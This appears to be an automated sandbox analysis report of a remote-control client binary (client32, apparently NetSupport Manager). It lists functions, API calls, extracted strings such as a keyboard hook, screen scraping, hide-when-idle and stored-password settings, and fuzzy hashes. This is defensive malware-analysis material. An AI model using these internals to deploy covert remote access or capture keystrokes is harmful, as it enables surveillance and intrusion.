Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $18/11/16 11:28:14 V12.10F20$506013$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-3322342010
Opcode ID: e925681e9f8466b56a3c9042d396dde717226b4199e7b2c94d0e0abd4c9137a1
Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
Opcode Fuzzy Hash: e925681e9f8466b56a3c9042d396dde717226b4199e7b2c94d0e0abd4c9137a1
Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

Function 11142010 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266
libraryregistryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(User32.dll), ref: 11142063
FreeLibrary.KERNEL32(00000000), ref: 111420D3
LoadLibraryA.KERNEL32(imm32), ref: 111420F6
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
_memset.LIBCMT ref: 11142169
LoadCursorA.USER32(00000000,00007F00,?,?,?,?,?,00000000,?), ref: 111421B9
GetStockObject.GDI32(00000000), ref: 111421C3
RegisterClassExA.USER32 ref: 111421DA
LoadLibraryA.KERNEL32(pcihooks), ref: 11142272
GetProcAddress.KERNEL32(00000000,HookKeyboard,?,?,00000000,?), ref: 11142287
SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
#17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
LoadLibraryA.KERNEL32(riched32.dll), ref: 111423E3

Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,B24479DC,11030346,00000000), ref: 11017A6E
Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
Part of subcall function 11017A40: QueueUserWorkItem.KERNEL32(110179E0,00000000,00000010), ref: 11017AD7
Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8

Part of subcall function 110CCC90: CreateWindowExA.USER32 ref: 110CCCC9
Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0

Strings

_License, xrefs: 11142122
imm32, xrefs: 111420EC
_debug, xrefs: 111422E1
InitUI (%d), xrefs: 1114203C
riched32.dll, xrefs: 111423DE
HookKeyboard, xrefs: 11142281
NSMWClass, xrefs: 11142147, 111421D3
pcihooks, xrefs: 1114226D
View, xrefs: 111422C1
*quiet, xrefs: 1114211D
UI.CPP, xrefs: 11142191, 111421EC
User32.dll, xrefs: 11142057
NSMGetAppIcon(), xrefs: 11142196
TraceCopyData, xrefs: 111422DC

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoItemLongObjectQueueRegisterStockTimerUserWindowWork_memset
String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 3910702804-3145203681
Opcode ID: 0c6cc3169c40bacbb2bf29f65020cbaace3c13be9d4fbd3d6ea0bb359ad99c5d
Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
Opcode Fuzzy Hash: 0c6cc3169c40bacbb2bf29f65020cbaace3c13be9d4fbd3d6ea0bb359ad99c5d
Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,73631528,?,0000001A), ref: 11028CFD
_strrchr.LIBCMT ref: 11028D0C

Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB

Strings

LongName, xrefs: 11028E95
AssistantName, xrefs: 110290AC
SupportsChrome, xrefs: 11029106
SupportWWW, xrefs: 11028FB5
Home, xrefs: 11028EF5
\, xrefs: 11028C8C
Name, xrefs: 11028E5E
SupportEMail, xrefs: 11028FE5
NSSTLA, xrefs: 11028F85
NSMAppDataDir, xrefs: 11029015
NSSLongCaption, xrefs: 11029175
NSSName, xrefs: 11028F55
??I, xrefs: 11029317
TechConsole, xrefs: 1102913D
SupportsAndroid, xrefs: 110291A2
NSSConfName, xrefs: 11029075
ShortName, xrefs: 11028EC5
??F, xrefs: 11029290
AssistantURL, xrefs: 110290D9
NSSAppDataDir, xrefs: 11029045
product.dat, xrefs: 11028CC0, 11028D11
TLA, xrefs: 11028F25

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

Function 11030EF3 Relevance: 40.6, APIs: 10, Strings: 13, Instructions: 350
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32 ref: 11030F12
RegCloseKey.ADVAPI32(?), ref: 11031037

Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912

GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(00348A70,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0

Strings

&, xrefs: 11031585
pcicl32, xrefs: 110314C5
.%d, xrefs: 110313F6
CurrentVersion, xrefs: 11030F35
3, xrefs: 11031066
Error %s unloading audiocap dll, xrefs: 11031603
CurrentMinorVersionNumber, xrefs: 11031000
j, xrefs: 11031341
j0U, xrefs: 11031554
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 11030EFE
*, xrefs: 11031381
CurrentMajorVersionNumber, xrefs: 11030FCD
, xrefs: 110313C2

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
API String ID: 1620732580-3468083601
Opcode ID: ed52c86302eb7f901d25fe393c1b878ef6ae758d34793e3430cbb3b188471344
Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
Opcode Fuzzy Hash: ed52c86302eb7f901d25fe393c1b878ef6ae758d34793e3430cbb3b188471344
Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51

Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 11086A5C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
LoadLibraryA.KERNEL32(?), ref: 11086ABC
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
GetProcAddress.KERNEL32(?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086AEC
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086AFD
GetProcAddress.KERNEL32(?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B0E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession,?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B1F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks,?,CipherServer_CloseSession,?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B30

Strings

CipherServer_DecryptBlocks, xrefs: 11086B3B
CipherServer_Create, xrefs: 11086AD1
CipherServer_GetInfoBlock, xrefs: 11086AF7
CipherServer_Destroy, xrefs: 11086AE6
CipherServer_OpenSession, xrefs: 11086B08
CipherServer_EncryptBlocks, xrefs: 11086B2A
CipherServer_ResetSession, xrefs: 11086B5D
CipherServer_GetRandomData, xrefs: 11086B4C
CipherServer_CloseSession, xrefs: 11086B19
CryptPak.dll, xrefs: 11086A2B, 11086A8E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54

Function 11142400 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 677registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 111424BA

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11142C48
_debug, xrefs: 11142966
Chg [%s]%s=%s, xrefs: 11142A75
Add [%s]%s=%s, xrefs: 111429B6
Client, xrefs: 1114294C, 11142BFF
Info. Policy changed - re-initui, xrefs: 11142B92
Info. Lockup averted for AD policy changes, xrefs: 1114269D, 111426C4
IsA(), xrefs: 11142C4D
Warning. Can't calc AD policy changes, xrefs: 11142905
Del [%s]%s=%s, xrefs: 11142A15
client, xrefs: 111428E3
client., xrefs: 111428C6
IKS.LIC, xrefs: 111424DF, 111424E6, 1114250D
Info. Policy changed - reload transports..., xrefs: 11142BB6
RoomSpec, xrefs: 11142947, 11142BFA
TracePolicyChange, xrefs: 11142961
NSM.LIC, xrefs: 111424C0
NSA.LIC, xrefs: 111424CF

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Close
String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 3535843008-1834795898
Opcode ID: 1857c41a8e31f6f9d6f5cfaee8ad3ba1a309d52ddc90f248eeedca6f3b402356
Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
Opcode Fuzzy Hash: 1857c41a8e31f6f9d6f5cfaee8ad3ba1a309d52ddc90f248eeedca6f3b402356
Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61

Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294
threadtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
_strncpy.LIBCMT ref: 11074E38
ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
CloseHandle.KERNEL32(00000000), ref: 11074F43
SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
std::exception::exception.LIBCMT ref: 11075038
__CxxThrowException@8.LIBCMT ref: 11075053

Strings

RememberPassword, xrefs: 11074E50
General, xrefs: 11074E55, 11074E85, 11074EF8
destroy_queue == NULL, xrefs: 11074DEB
Password, xrefs: 11074EF3
..\ctl32\Connect.cpp, xrefs: 11074DE6
DefaultUsername, xrefs: 11074E80

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
API String ID: 703120326-1497550179
Opcode ID: 0c698a329db76758207e900089e67b2672369198240e6b08767f188b49888f36
Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
Opcode Fuzzy Hash: 0c698a329db76758207e900089e67b2672369198240e6b08767f188b49888f36
Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65

Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,750A94D8), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

PostMessageA.USER32 ref: 11139C4F

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SetWindowTextA.USER32(0001033C,00000000), ref: 11139CF7
IsWindowVisible.USER32(0001033C), ref: 11139DBC
GetForegroundWindow.USER32 ref: 11139DDC
IsWindowVisible.USER32(0001033C), ref: 11139DEA
SetForegroundWindow.USER32(00000000), ref: 11139E18
EnableWindow.USER32(0001033C,00000001), ref: 11139E27
IsWindowVisible.USER32(0001033C), ref: 11139E78
IsWindowVisible.USER32(0001033C), ref: 11139E85
EnableWindow.USER32(0001033C,00000000), ref: 11139E99
EnableWindow.USER32(0001033C,00000000), ref: 11139DFF

Part of subcall function 11132120: ShowWindow.USER32(0001033C,00000000), ref: 11132144

EnableWindow.USER32(0001033C,00000001), ref: 11139EAD

Strings

Client, xrefs: 11139AF1, 11139B9B, 11139BD4, 11139C32
HideWhenIdle, xrefs: 11139AEC
LockedText, xrefs: 11139BCF
ConnectedText, xrefs: 11139B88, 11139B97
ShowUIOnConnect, xrefs: 11139C2D
ViewedText, xrefs: 11139B7B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 3453649892-3803836183
Opcode ID: a88fc41a469019d1400cb27a4983c8b03ac4313f50edbdc2c1f6cd16a0585786
Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
Opcode Fuzzy Hash: a88fc41a469019d1400cb27a4983c8b03ac4313f50edbdc2c1f6cd16a0585786
Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791

Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 11030645
PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797

Strings

_debug, xrefs: 110306A4
Client, xrefs: 11030671
NSMWControl32, xrefs: 11030792
NSMWClass, xrefs: 1103062F
Default, xrefs: 1103078B, 110307BA, 110307E3
Ready, xrefs: 11030801
TCPIP, xrefs: 11030743
TraceIPC, xrefs: 1103069F
Global\NSMWClassAdmin, xrefs: 1103063A
NSTWControl32, xrefs: 110307EA
UseIPC, xrefs: 1103066C
NSSWControl32, xrefs: 110307C1
*ListenPort, xrefs: 1103073E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
